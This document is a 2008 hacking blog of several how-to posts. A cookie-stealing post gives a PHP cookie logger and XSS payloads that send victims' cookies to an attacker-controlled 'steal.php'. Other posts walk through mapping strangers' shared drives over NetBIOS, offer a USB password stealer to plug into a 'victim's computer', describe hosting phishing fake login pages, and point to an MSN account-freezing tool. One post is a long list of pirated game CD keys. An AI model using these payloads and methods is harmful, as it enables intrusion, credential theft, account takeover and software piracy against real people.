Cookie   Stealing

Posted in Snarfing with tags cookie snarf, how to steal cookies on August 12, 2008 by hacktocrack

Cookiestealing is one of the most fundamental aspects of XSS (cross site scripting).Why is the cookie so important? Well, first you should see exactly what sort ofinformation is stored in a cookie. Go to a website that requires a login, and afterlogging in erase everything in your address bar and type this line of code:

Code:jalert(document.cookie)

After you press enter, you should see a pop-up window with some information in it(that is, if this site uses cookies). This is the data that is stored in your cookie. Here’s an

example of what might be in your cookie:

Code:username=CyberPhreak;

password=ilikepie

This is, of course, a very insecure cookie. If any sort of vulnerability was found thatallowed for someone to view other people’s cookies, every user account is possiblycompromised. You’ll be hard-pressed to find a site with cookies like these. However, itis very common (unfortunately) to find sites with hashes of passwords within the cookie.The reason that this is unfortunate is because hashes can be cracked, and oftentimesjust knowing the hash is enough.

Now you know why cookies are important; they usually have important information about the user in them. But how would we go about getting or changing other users’ cookies? This Is the process of cookiestealing.

Cookiestealing is a two-part process. You need to have a script to accept the cookie, andyou need to have a way of sending the cookie to your script. Writing the script to acceptthe cookie is the easy part, whereas finding a way to send it to your script is the hardpart. I’ll show you an example of a pHp script that accepts cookies:

Code:<?php$cookie=$_GET['cookie'];$log=fopen(”log.txt”,“a”);fwrite($log,$cookie.”\n”);fclose($log);?>

And there you have it, a simple cookiestealer. The way this script works is that it acceptsthe cookie when it is passed as a variable, in this case ‘cookie’ in the URL, and thensaves it to a file called ‘log.txt’. For example:

Code:http://yoursite.com/steal.php?cookie=steal.php

is the filename of the script we just wrote, ? lets the script know that we aregoing to pass some variables to it, and after that we can set cookie equal to whateverwe want, but what we want to do is set cookie equal to the cookie from the site. Thisis the second and harder part of the cookiestealer.

Most websites apply some sort of filter to input, so that you can’t directly insert yourown code. XSS deals with finding exploits within filters, allowing you to put your owncode into a website. This might sound difficult, and in most cases it’s not easy, butit can be very simple.

Any website that allows you to post text potentially allows you to insert your own codeinto the website. Some examples of these types of sites are forums, guestbooks, any sitewith a “member profile”, etc. And any of these sites that have users who log in alsoprobably use cookies. Now you know what sort of sites might be vulnerable tocookiestealing.

Let’s assume that we have a website that someone made. This website has user logincapability as well as a guestbook. And let’s also assume that this website doesn’t haveany kind of filtering on what can be put into the guestbook. This means that you canput HTML and Javascript directly into your post in the guestbook. I’ll give you anexample of some code that we could put into a guestbook post that would send the user’scookie to out script:

Code:<script>document.location=‘http://yoursite.com/steal.php?cookie=’+document.cookie;</script>

Now whenever someone views the page that you posted this on, they will be redirected toyour script with their cookie from this site in the URL. If you were to look at log.txtnow, you’d see the cookies of whoever looked at that page.

But cookiestealing is never that easy. Let’s assume now that the administrator of thissite got smart, and decided to filter out script tags. Now you code doesn’t work, sowe have to try and evade the filter. In this instance, it’s easy enough:

Code:<ahref=”jvoid(document.location=’http://yoursite.com/steal.php?cookie=’+document.cookie)”>Click Me</a>

In this case, when the user clicks on the link they will be sent to your stealer with theircookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to getaround filters.

Restart your friend’s phone using   sms

Posted in hacking, offline hacking with tags hack phone with sms, how to restart phone, how to restart phone using sms, restart phone on August 4, 2008 by hacktocrack

Here is a new trick to restart ur friends mobile via sms

with this trick only 1110,1110i,1112,1100,2100 can be restarted.

just type

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

or 79 inverted commas

in text msg and send it to ur friend having cells mention above and see wat happens.

Exploit SQL Server   System

Posted in Hardcore Hacking, Website hacks, hacking with tags hack sql, sql, sql hack, sql hacking, sql injection, sql server system on August 4, 2008 by hacktocrack

Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.

1. Direct connections via the Internet

These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield’s Port Report shows just how many systems are sitting out there waiting to be attacked. I don’t understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.

2. Vulnerability scanning

Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.’s NGSSquirrel for SQL Server (for database-specific scanning). They’re easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.

Figure 1: Common SQL injection vulnerabilities found using WebInspect.

3. Enumerating the SQL Server Resolution Service

Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews’ SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren’t listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.

4. Cracking SA passwords

Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.

5. Direct-exploit attacks

Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.

Figure 2: SQL Server vulnerability exploitable using Metasploit’s MSFConsole.

6. SQL injection

SQL injection attacks are executed via front-end Web applications that don’t properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually — if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics’ SQL Injector, shown in Figure 3.

Figure 3: SPI Dynamics’ SQL Injector tool automates the SQL injection process.

7. Blind SQL injection

These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn’t receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that’s where Absinthe, shown in Figure 4, comes in handy.

Figure 4: Absinthe tool takes the pain out of blind SQL injection testing.

8. Reverse engineering the system

The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you’ll find a discussion about reverse engineering ploys.

9. Google hacks

Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors — such as “Incorrect syntax near” — leaking from publicly accessible systems. Several Google queries are available at Johnny Long’s Google Hacking

Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google’s ’site:’ operator often turns up juicy info you never imagined you could unearth.

10. Perusing Web site source code

Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.

NetBios   Hacking

Posted in hacking, offline hacking with tags hack netbios, hacking netbios, how to hack netbios, netbios, netbios hacking, what is netbios on August 2, 2008 by hacktocrack

For this tutorial, I used Microsoft’s Windows XP Home Edition OS

What is it?

NetBIOS Hacking is the art of hacking into someone else’s computer through your computer. NetBIOS stands for “Network Basic Input Output System.” It is a way for a LAN or WAN to share folders, files, drives, and printers.

How can this be of useful to me?

Most people don’t even know, but when they’re on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.

What do I need?

Windows OSCain and Abel

CODE(http://www.oxid.it/downloads/ca_setup.exe)

————–

So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local

subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross

Another window will pop up, make sure “All host in my subnet” is selected, and then click ok.

It should begin to scan.

Then IP’s, computer names, and mac addresses will show up. Now remember the IP address of the computer you are going to be breaking into. If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok. During the next step we will begin our trial and error.

Part2, Trial and Error

Now, we don’t know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN. If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on. Click on the start menu and go to run, type in cmd, and click ok. This should bring up the command prompt. From here we will do most of the hacking. Now I will be referring to certain commands that need to be inputted into the command prompt. I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt. I am only doing this to avoid confusion. Let’s get back to the hacking. Type in “ping (IP address of the target).” For example in this tutorial, “ping 192.168.1.103.” This will tell us if the target is online. If it worked, it will look something like this (note, I have colored out private information):

IF it didn’t work, meaning that the target is not online, it will look something like this:

If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.

Part3,GatheringtheInformation.

Now, input this command “nbtstat –a (IP address of target).” An example would be “nbtstat –a 192.168.1.103.” This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.

Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it.

The information right below the original command says: “Local Area Connection,” this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP.

The information right below the “Local Area Connection,” is “Wireless Network Connection 2:” It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into.

The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn’t. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below

BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup

Step4,BreakingIn———————————————————————————————–

Finally it’s time. By now we know: that our target is online, our target has file sharing, and our target’s computer name. So it’s time to break in. We will now locate the shared drives, folders, files, or printers. Type in “net view \\(IP Address of Target)”An example for this tutorial would be: “net view \\192.168.1.103”

We have our just found our share name. In this case, under the share name is “C,” meaning that the only shared thing on the computer is C. Then to the right, under Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person’s hard drive.

All’s that is left to do is “map” the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in “net use K: \\(IP Address of Target)\(Shared Drive). For my example in this tutorial, “net use K: \\192.168.1.103\C.” Ok, let’s say that you plan on doing this again to a different person, do u see the “K after “net use?” This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be “net use G…,” for a different target.

As you can see, for my hack I have already used “K,” so I used “G” instead. You may also do the same for multiple hacks. If it worked, it will say “The command completed successfully.” If not, you will have to go retrace you steps. Now open up “my computer” under the start menu, and your newly created network drive should be there.

Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive. The drive will not be deleted after you disconnect though, but you won’t be able to access it until you reconnect to the network. So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer, because you never know if the target changes the sharing setting. If you are just doing this to hack something, then go explore it and have some well deserved fun!

Congratulations!You’reDONE!But, before you leave, please look over some of this information for further help and just for thanks to me.

-Commands used in this tutorial:

PINGNBTSTAT -a (IP Address of Target)NET VIEW \\(IP Address of Target)NET USE K: \\(IP Address of Target)\(SHARENAME)

4 Comments »

Game CD   Keys

Posted in Uncategorized with tags cd keys, download keygen, game cd keys, keygen, software cd keys on August 2, 2008 by hacktocrack

1503 A.D. The New World serial: 0705-7933859-6725970-0015Age Of Mythology br Serial: P3HM4-WDM27-662XW-9BPTV-CFVMQAl Qaeda Hunting 3D serial: 23822Back and White Br serial : 0901-3324366-4702210-2081Battlefield 1942 Serial : 5000-0000000-0000000-1318Battlefield 1942: Secret Weapons of WWII: 2gyy-3wlk-8btf-wjur-g277Battlefield Vietnam: V2W6-54VJ-9R11-XJPV-79CMBattlefield 2: TW99-NWBV-0PVZ-EAEI-JVTLBLACK & WHITE BR - 0901-3324366-4702210-2081Black & White: Creature Isle serial: 1740-9488245-5171152-1858Chrome (c) Take 2: XTITY-92Y9L-MGPVA-KJ4Z6CLIVE BARKER’S UNDYING - 2500-0911911-0911911-2705Comanche 4 serial: 3s2d-flt1-cls2-rule-7865Command & Conquer Generals: Zero Hour Expansion:ULPF-ZEVK-FRWG-Q4YJ-6F2TCommand & Conquer: Renegade serial: 056894-929488-118387-9679COMMAND E CONQUER GENERALS SERIAL: 4963-7882913-5984076-0674Copa do Mundo FIFA 2002 BR SERIAL: 5500-5827167-6713862-1708Dark Reign 2 CD Key : GAR3-RAB8-FUP9-NYZ7-2832Dead Man’s Hand S/N: DEVB-Q7S3-Z5T8-ZGE8-AZ84-JT3KDelta Force 3: Land Warrior - s/n: N5E3-YXH2-G983-9WYB-B3ZSDelta Force 4: Task Force Dagger serial: 72YL-R4SB-GKG6-3WKS-HQ27Delta Force 5 Black Hawk Down serial: QF7S-HZMK-XLXP-CUJN-HDTZDelta Force Black Hawk Down: Team Sabre (Expansão)Delta Force Xtreme: DFX-WESTIL-LKICKY-DULASS-ANYDAYSerial: AV4E-YVQE-NACM-DD3M-KBW3DELTA FORCE: LAND WARRIOR - N33G-6HM2-9Y8F-HD4U-M7S9Devastation_CDKEY: 5B36F-976AA-6A471-58B8D-92B7B

DOOM 3 CD Key: VB44-6BWV-H6UZ-RRPE-5EDominius II Serial: 1111-1111-1111-064Earth 2150 : Lost Souls Serial : 7XJC-UD2E-E83L-Z5T5Emperor: Rise of the Middle Kingdom Serial : BAC9-RAL8-SAS2-SAX2-9999Empire Earth: Art of Conquest Serial : GER2-MAN2-RAP2-PER5-2252F1 2002 SERIAL: 7931-9865028-6024865-1156

F1 champiship season 2000 serial: 2000-5005241-5005241-6839FA_Premier_League_Manager_2002: 4507-1863659-3033569-5650FIFA 2003 BR: BL7G-929A-2YXE-UFZZFIFA SOCCER 06: ON99-FLZU-9DEV-WTFM-6DEVFreedom Fighters: PQGY-4FAQ-TMQ5-Q4X8-KXCSFREEDOM FORCE: 1439-8808778-3837107-2854Frontline Attack - War over Europe SERIAL: FUBP-EYNZ-KFXC-SKM2Galactic Civilizations With Bonus serial: DN-500792-GC1-CLS4FLT8XTGLOBAL OPERATIONS: 5000-0000000-0000000-5021Ground Control Serial : RAC2-RAL2-CAS3-RAD3-3542half life couter strike serial: 2462-92319-7642half life edição especial:UCF1840810021327half life opposing force serial: 2708-43011-3332 ou UCF1840810021327HALF LIFE: UCF1840810021327HALF-LIFE - 2420-92220-4482HALF-LIFE: COUNTER-STRIKE - 2462-92319-7642HARRY POTTER : 0901-7014788-4117807-0206Harry Potter: Quidditch World Cup: 3FJA-LVDF-DAJP-34HR-RDEVHARY POTER E A CAMERA SECRETA SERIAL: 7954-3123341-1387427-3052Heli Heroes - serial: 8bnk-c9eh-63hb-kj88Hidden and Dangerous 2: 1234-5678-9abc-dddfHomeworld 2 (c) SIERRA: NAS3-DEC2-BYJ5-CUJ6-8385homeworld: BAB2-BAB2-CEZ8-TAC3-9978Hoyle_Majestic Chess: XYN6-NAB4-FES2-MUX7-3485IGI 2 COVERT STRIKE SERIAL: 031F-F8D0-6536-B510James Bond 007: NightFire Serial : 1740-9488245-5171152-5578Judge Dredd: Dredd Vs. Death: NUN6-GAB2-TAX7-ZYG6-3537Kelly Slater Pro Surfer Serial: 0f162xa28pg34dhcKingdom Under Fire Gold Edition serials: E3VI FP69 HT79 5KVGLego Soccer Mania serial: 1500-0776239-9370523-4726

madden nfl 2001: 1500-6610360-1643530-0243Madden NFL 2004: VMZ9-JXRC-AZOR-J000-1911Madden_NFL_2002_ CDKEY enter: 0901-5445152-2745753-4827Medal Of Honor Allied Assault Breakthrough: L5KB-32WY-B6G5-6747-YQ49Medal of Honor: Allied Assault CD Key, enter 5000-0000000-0000000-5068MEDAL OF HONNOR: ALLIED ASSAULTKey: 7931-9865028-6024865-9663Microsoft Flight Simulator 2002 - Airport 2002 Volume 1serial use:

A221-A24AABAA-FDBA5DD9Moto Racer 3: 54e9-a751-1da8-e109-efb3-51f9-d90f-75d0-

2250MVP Baseball 2003 CD Key: JNXC-PAPN-KR96-MY5Pnascar 2002 SERIAL: RAF2-RAL2-RAS2-RAX2-6667NASCAR RACING 4 - GAC7 REB8 TUX6 DAC2 7833Nascar Thunder 2003 serial: NASC-ARTH-UNDE-RJAMNascar Thunder 2004: CLZH-PE48-R9RR-G9ZT-9DSWNBA LIVE 2001 - 2001-0020601-0010978-6694NBA Live 2001 CD Key: 2001-0020601-0010978-6694NEED FOR SPEED 2003: HOT PURSUIT 2 serial: 8249-7EE3-84EW-TXGTNeed For Speed: Underground s/n: SQZZ-2Y44-8AS4-7QSQ-YDEVNeverwinter Nights serial QFETM-MPU3X-DN6FF-MHFDA-YWARA-4HMPE-RDJTGNHL 2002: 1000-2003004-0000000-4904NHL 2004: 6T22-8L62-6666-8666-6666O.R.B:SERIAL: JTRV74NVVKUJX7AMOperation Flashpoint Gold Upgrade Red Hammer serial M3CZ P5186 XNEYLCL0T7 513NTOUT LIVE BR: c9523c-1a4466-237cb8-dc7e67Pro Evolution Soccer 5: NXUD-PACV-EM2X-KPC9-6AYU

QUAKE III Arena - THWT37AB3P7JBTPCQUAKE III Team Arena - TSBH 7CCG DPWP B2LT 84QUAKE IV: 9TFP-TXCG-XFMM-XXR9-9DGTReturn to Castle Wolfenstein CD Key: CLAL-A7WJ-DTSJ-WARP-88Rise of Nations:RXVC3-B3347-DVG9X-FTFQF-9M7XTRoller Coaster Tycoon 3 serial: RLDU-M24D-83CX-C8LZ-WDHS-ETNDS.W.A.T. 3 - Elite Edition - TED4-SAB4-DUB7-CYJ2-8652Sacrifice serial: xxxx-xxxx-xxxx-xxxxSail Simulator 4.2 Serial : SS42-V7CGQ-9BCGM-4C326-JW25CSavage: The Battle for Newerth: LB42-Z05V-VK9S-I7BM-58S5Sega GT Serial : GTJ08010-322007-01723Serial do Tiger: 1500-3202255-2068109-2932Shogun 2: CDKEYS = 0901-3721384-6427058-7026Shogun Total War Serial : 1600-0052410-0052410-6424SIM CITY 3000 UNLIMITED BR - 5001-9781634-6520278-1000Sim City 4 Rush Hour *MULTI*: CLC4-5ZU8-6C4S-9W46-LS4Esimcity 4 serial: GRUS-4528-8217-1ULFSimcoaster serial : 2001-0013101-0010978-2823SIMGOLF: 5000-0000000-0000000-5071SOLDIER OF FORTUNE 2: 3Z4J - J3PP - K848 - EWPK - 1FSOLDIER OF FORTUNE GOLD - BEN6-MUC8-BEZ6-BUJ6-3764Spell Force: 08AFX-CGGML-W260D-5RRP0-CVNFDSpy Hunter Serial: SHU3E7RVCCRBFHSS

Star Trek Elite Force 2 - TFAK-7WCH-44RH-YJ7X-F9E9Star Trek StarFleet Command : Orion Pirates Serial :4008-B491-1DC3-0F6Cstarfleet command 3 serial: 0000-0000-0000-K28KSTARTRECK: RYS8-LAB4-JEF8-BYM3-4652Sub Command: Seawolf-Akula CDKEY: 0901-1315206-2102812-3248SUPERBIKE 2001 - 1500-4288423-2982915-3163Team Factor SERIAL: 2NKZYY9-2SKAKSCTerminator 3: Rise of the Machines Serial: TTDA-H8VW-KJDV-NNKA

THE SIMS BR - 100486-585530-905808-0928THE SIMS DELUXE BR SERIAL: 5500-5782961-4067120-2138

5500-7457886-5179416-4991throne of darkness serial : RAC2-RAD2-RAC2-RAC2-3387Tiger Woods PGA Tour 2002 serial: 5000-0000000-0000000-5045TIGER WOODS PGA TOUR 2003 SERIAL: FLTR-0825-9192-1RLCTony Hawks Pro Skater 4: P4EPBTIQDAIH7WXMTotal Club Manager 2003 serial : 1500127097911060657818Train Simulator - The Activities Serial: 6850-YV6AYS6BTrainz serial, enter: RAZO-R9XI-XXXC-XXXT-XXGX-1911Tron 2.0 (c) Disney Interactive: 9393-L9CN-PRTB-T7N4-5858Universal Combat Serial: 2B46-97F6-OF33-99BB “Atenção o O podera serum 0″Unreal Tournament 2003 Serial : LYR22-RZ743-A9D7T-CNNENWar! Age of Imperialism: 1101-8603-2629-7418

Lord of the Rings: War of the Ring: XUF5-JUB2-JAB8-JUD3-4947Lord Of The Rings The Return Of The King: s/n: TMXF-Q23L-LCEG-Y9WW-V94GHarry Potter: Quidditch World Cup: 3FJA-LVDF-DAJP-34HR-RDEVMSEE-5EL4-WYBB-DGLU-GDEV6Q7F-WAAC-8QTH-WLC4-EDEVQ3N6-2X4N-A4EA-NY64-GDEVGJGQ-4SLL-EA4Y-FJSU-UDEV5LM5-M22H-45YT-W88Z-2DEVC6U4-7A49-4CE2-MUGL-8DEVBH4U-GCNX-WMJ8-ZGKY-4DEVKAU4-AVFV-34AK-782Y-4DEVY3QQ-TUGW-4NU4-ZG68-6DEVHidden and Dangerous 2: 1234-5678-9abc-dddfPinnacle Instant Video Album V1.01 Multilanguage: 7777777777The Sims Num Passe de Magica: U9BK-8XSP-YAG4-WYL4-SDEVPSB3-DLW5-3GPV-P8BU-HDEVJudge Dredd: Dredd Vs. Death: NUN6-GAB2-TAX7-ZYG6-3537CIVIL 3D V2004: 400-00000000War! Age of Imperialism: 1101-8603-2629-7418

Freedom Fighters: PQGY-4FAQ-TMQ5-Q4X8-KXCSCakewalk MediaWorks Serial: CWMW1.00-009968Neato MediaFace Serial: 7135be-1339bd-1a33-5c670NHL 2004: 6T22-8L62-6666-8666-6666FQ22-BXTP-FLT!-ELT!-FLT!CHYQ-AVKH-CRKD-GRKD-CRKDBZ8G-WCOL-L8JD-SUXM-LTBVA75V-8YSW-JQ75-NE79-LC4WZZGY-JQVB-PJ4T-6K6K-4INYB233-BN2E-BUL3-87C5-4YZAAWZH-HVNV-P8FK-XHPQ-8EUJJ4LL-PZID-QZEM-RPQ2-UHRFRKRR-R3C4-QWP8-QUXI-96KC

1 Comment »

Cloning Hard   Drives

Posted in hacking with tags clone hard drive, cloning hard drives, hack, hacking, hacking tips and tricks, how to clone hard drive on August 2, 2008 by hacktocrack

Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn’t know that all that you needed, was already set up on your current system? Well, it is… and if you follow this tut, you shouldn’t have much of a problem.

Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.

First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.

Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.

Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the “Full” button.

Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says “Autofix Errors”.

Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure that you can do it without making any mistakes:

Click on the “Start” button, then click on the “Run…” button, then place the following into the Runbox:

“XCOPY C:\*.*D:\ /c/h/e/k/r” (minus the quotes, of course) then press the “Enter” button.

If you receive an error message, then remove the space from between XCOPY and C:\

Anything that should happen to come up in the DOS box, just click “Y” for “Yes”. When its all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out.

This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn’t have any problems. If, by any chance, you should come across a snag, message me and I’ll walk you through it.

2 Comments »

USB Password   Stealer

Posted in Easy Hacking, Password Hacking, hacking, offline hacking with tags hack passwords, hack windows password, hack xp, hack xp password, licence stealer, password hacker, Password Hacking, steal passwords, steal usb passwords, usb hacking, usb hacks, usb password stealer, usb theif, usbtheif, xp hacks on July 30, 2008 by hacktocrack

Tweaked USB that steals every passwords including licences.

Instructions1.Decompress the archive and put all the files located in the folder “USBThief”into a USB.2.Insert the USB in your victim’s computer.3.View folder “dump” to see the passwords.

Download

Password: www.dl4all.com

3 Comments »

Protect yourself from fake login   pages

Posted in Password Hacking with tags fake login pages, hacking, hacking tips, how to make fake login pages, how to phish, learn how to phish, login phishing, phishing, protect yourself from phishing on July 26, 2008 by hacktocrack

Using fake login pages is the easiest way to hack passwords. Identifying a fake login page is very easy but many people neglect to do some small checks before entering the login details and fall in the trap. I have seen a person paying 500$ for a fake login page of paypal. This proves that there are still people falling in this trap. This is just an example, there are many fake websites of banks, yahoomail, gmail,orkut,myspace etc …This post is an attempt to show what a hacker does to hack your password using fake login pages and how to protect yourself from those fake logins.I will try to keep this post as simple as possible, there may be some technical details which you can safely skip.Warning: I strongly advice you not to try this on anyone it may spoil your relation with the person on whom you are trying it and you may even end up behind the bars.

What goes on behind when you enter your login details in login form??

When you enter your login details in any login form and hit enter they are submitted to another page which reads these login details and checks the database if you entered the correct username and passowrd, if yes then you will be taken to your account else you will get an error page.What an hacker does??

A hacker creates a fake page which looks exactly same as the original page and some how tricks you to enter your login details in that page. These login details are then submitted to a file.At this stage the hacker has two optionsHe can either store the login details on his server or he can directly get them mailed to his email id. All the above said things happen behind the scenes, you will have no clue of it. When you enter you login details for the first time your details are submitted to the hacker and you will be directed to a error page ( this is the original error page). When you enter ur login details again you will be logged in to your account. It’s quite common for us to enter the login details wrongly sometimes so you will not become suspicious when you get the error page.

How to identify fake login page traps ??

1. Never enter you login details in unknown sites. 2. Always type the address directly in to the browser. 3. Do not follows the links you get in mails and chatting even if they are from your

friends 4. Always have a keen look in the address bar and verify if the address is correct.

Check the screen shot below. Some people buy doamins which look simliar to the original site example: 0rkut for orkut, pay-pal for paypal,yahooo for yahoo. Some times you may over look these small differences and fall in trap.

5. Please do report to the hosting site or the original site owner when you find a fake login page.

6. If you feel like you entered your details in a fake login page change your password immediatley.

Now let’s go on with the trick..

You have to upload the fake login page on some server with php support. There are many free web hosting services available on the net, first sign up for anyone of them.Google for some free webhosting services,you will find many. Upload the files in the zipped folder on to your server and give the link of the fake login page to the person whose password you want to know. When the person enters his email id and password in to the fake login page they will be stored in a HTML file named “passwd.htm” on your server in the same directory where you uploaded the login page.  Check that text file to get the passwords you wanted.

Here is the demo of the trick

Note:Don’t enter your actual password

click this link to view the fake login page of yahoo

The password you entered is saved into this page

1 Comment »

Hacktocrack Is Back   Online!

Posted in Uncategorized on July 26, 2008 by hacktocrack

Hey Everyone

This Blog Had Been Suspended For A Few Months.

I finally hacked my own blog to unsuspend it..

I have no Idea if this site might get suspended again..

but anyways I will try to keep it for as long as possible…

I have to Moderate over 400 comments Now lol.

Will Start Posting again soon…

Hacktocrack has an official site at www.ageniusblog.com

check it out!

Leave A Comment »

Create Folders And Files With NO!   Name

Posted in Easy Hacking, Notepad Tricks, Other, hacking tips, offline hacking with tags create file with no name, create folder with no name, Create Folders And Files With NO! Name, free tips, hacking, hacking tips, hacking tricks on April 5, 2008 by hacktocrack

This trick will allow you to create files and folders without any name.

Just follow the following steps:1.Select any file or folder.2.Right click on it, press rename or simply press F2.3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from the numpad.

Note: Type the numbers 0160 from the numpad, that is, the numbers present on the right side of the keyboard. Don’t type the numbers which are present on top of the character keys.

4.Press Enter and the nameless file or folder will be created.

Reason: The file or folder that seems nameless is actually named with a single space.

But what if you want to create another nameless file or folder in the same directory ?

For this you will have to rename the file with 2 spaces. Just follow these steps below:

1.Select file, press F2.2.Hold alt key and type 0160 from the numpad.3.Release the alt key. Now without doing anything else, again hold alt key and press 0160.4.Press enter and you will have second nameless file in the same directory.5.Repeat step 3 to create as many nameless files or folders in the same directory.

(we’ve had a problem with deleting these folders, to do so, start your computer in safe mode and delete it from there.)

8 Comments »

Ice Cold   Reloaded

Posted in Easy Hacking, Email, Hotmail with tags hack hotmail, hack msn hotmail, how to hack, how to hack hotmail, msn freezer on April 5, 2008 by hacktocrack

MSN Passport Account Freezer and (De)Freezer [basically just stops freezing]. It gives you the ability to prevent a person from signing into MSN Messenger, or his/her hotmail inbox. It includes support for the latest MSN Messenger Protocol.

Download Link http://download.download-free-software.net/IceCold_ReLoaded

12 Comments »

Test - Hack Into this   page

Posted in Password Hacking, hacking, hacking websites with tags hack into page, hack websites, hacking, how to hack websites, Password Hacking, website hacking on April 5, 2008 by hacktocrack

A Test to see if You are Really A Hacker Hack This Page - http://hacktocrack.wordpress.com/hack-into-this-page/

Very Simple.

Leave A Comment On The Page To Let Me Know If You Have Hacked It

22 Comments »

Find IP info using   Gmail/Yahoo/Hotmail

